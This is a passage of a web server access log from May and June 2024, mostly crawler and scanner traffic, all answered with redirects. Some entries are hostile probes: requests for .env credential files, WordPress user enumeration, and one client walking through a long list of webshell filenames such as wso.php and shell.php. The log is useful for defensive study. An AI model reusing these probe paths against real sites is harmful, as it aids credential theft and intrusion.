Safari/537.36" 65.154.226.169 - - [21/May/2024:10:29:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 207.241.236.84 - - [21/May/2024:10:30:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/52b2551 warc/v0.8.38" 35.180.44.213 - - [21/May/2024:13:01:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36" 102.129.153.88 - - [21/May/2024:13:01:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36" 138.199.47.224 - - [21/May/2024:13:01:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36" 149.40.54.138 - - [21/May/2024:13:01:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 128.90.104.63 - - [21/May/2024:13:01:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 102.129.153.88 - - [21/May/2024:13:02:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 102.129.153.88 - - [21/May/2024:13:02:01 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36" 150.136.144.2 - - [21/May/2024:21:31:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; AS; rv:11.0) like Gecko" 88.99.26.177 - - [21/May/2024:22:58:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36" 35.171.144.152 - - [22/May/2024:04:59:24 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 205.210.31.156 - - [22/May/2024:09:17:49 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 43.157.33.199 - - [22/May/2024:22:42:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" 31.186.172.143 - - [23/May/2024:02:31:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.186.172.143 - - [23/May/2024:02:31:28 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.186.172.143 - - [23/May/2024:02:31:35 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 178.62.64.79 - - [23/May/2024:03:34:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 199.45.155.51 - - [23/May/2024:13:59:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 87.236.176.16 - - [24/May/2024:01:30:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 167.71.81.161 - - [24/May/2024:09:41:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 185.209.230.217 - - [24/May/2024:18:00:19 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.209.230.217 - - [24/May/2024:18:00:25 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.209.230.217 - - [24/May/2024:18:00:31 +0700] "GET /sendgrid/.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.209.230.217 - - [24/May/2024:18:00:34 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 198.235.24.182 - - [24/May/2024:22:33:34 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 165.22.227.44 - - [25/May/2024:01:42:35 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 124.70.205.207 - - [25/May/2024:01:49:16 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 124.70.205.207 - - [25/May/2024:01:49:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 124.70.205.207 - - [25/May/2024:01:49:29 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 92.118.39.244 - - [27/May/2024:03:45:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0" 39.103.225.8 - - [27/May/2024:04:37:58 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.103.225.8 - - [27/May/2024:04:38:04 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.103.225.8 - - [27/May/2024:04:38:08 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [27/May/2024:21:12:12 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:23 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:27 +0700] "GET /inc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:31 +0700] "GET /lv.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:37 +0700] "GET /seo.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:40 +0700] "GET /x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:45 +0700] "GET /b0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:49 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:52 +0700] "GET /cloud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:12:57 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:05 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:10 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:13 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:18 +0700] "GET /wp-2019.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:21 +0700] "GET /atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:25 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:29 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:36 +0700] "GET /log.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:43 +0700] "GET /index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:54 +0700] "GET /mail.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:13:59 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:06 +0700] "GET /doc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:15 +0700] "GET /bak.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:21 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:25 +0700] "GET /upfile.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:30 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:35 +0700] "GET /wp-conflg.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:38 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:42 +0700] "GET /wp-activate.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:14:52 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:01 +0700] "GET /updates.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:05 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:09 +0700] "GET /plugins.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:13 +0700] "GET /xmrlpc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:16 +0700] "GET /ae.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:24 +0700] "GET /moon.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:28 +0700] "GET /blog.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:31 +0700] "GET /themes.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:35 +0700] "GET /ini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:39 +0700] "GET /as.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:42 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:48 +0700] "GET /ws.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:51 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:15:58 +0700] "GET /makeasmtp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:08 +0700] "GET /wp-sigunq.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:13 +0700] "GET /wso112233.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:20 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:24 +0700] "GET /fw.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:29 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:33 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:38 +0700] "GET /mini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:42 +0700] "GET /configs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:48 +0700] "GET /test.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:53 +0700] "GET /classsmtps.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:16:57 +0700] "GET /wp-hudbud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:17:01 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:17:06 +0700] "GET /autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [27/May/2024:21:17:12 +0700] "GET /text.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 205.210.31.217 - - [28/May/2024:13:56:30 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 80.94.92.105 - - [28/May/2024:15:26:23 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0)" 198.235.24.25 - - [28/May/2024:19:45:11 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 144.91.106.14 - - [29/May/2024:03:53:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 188.165.87.97 - - [29/May/2024:22:03:56 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 94.228.169.182 - - [30/May/2024:00:24:10 +0700] "GET /.env HTTP/1.1" 301 162 "-" "python-requests/2.26.0" 103.102.228.130 - - [30/May/2024:03:12:54 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/25.0.1 Version/17.2 Safari/605.1.15" 134.122.27.24 - - [30/May/2024:03:39:21 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 134.122.27.24 - - [30/May/2024:03:39:26 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 134.122.27.24 - - [30/May/2024:03:39:34 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 178.128.107.139 - - [30/May/2024:10:05:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 178.128.107.139 - - [30/May/2024:10:06:00 +0700] "GET /wordpress/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 45.88.90.2 - - [30/May/2024:22:09:37 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" 34.255.99.96 - - [31/May/2024:21:58:29 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 35.212.147.88 - - [01/Jun/2024:00:39:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36" 205.210.31.5 - - [01/Jun/2024:01:16:01 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 205.210.31.165 - - [01/Jun/2024:11:17:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [02/Jun/2024:07:08:59 +0700] "GET /wp-22.php?bction=ping HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 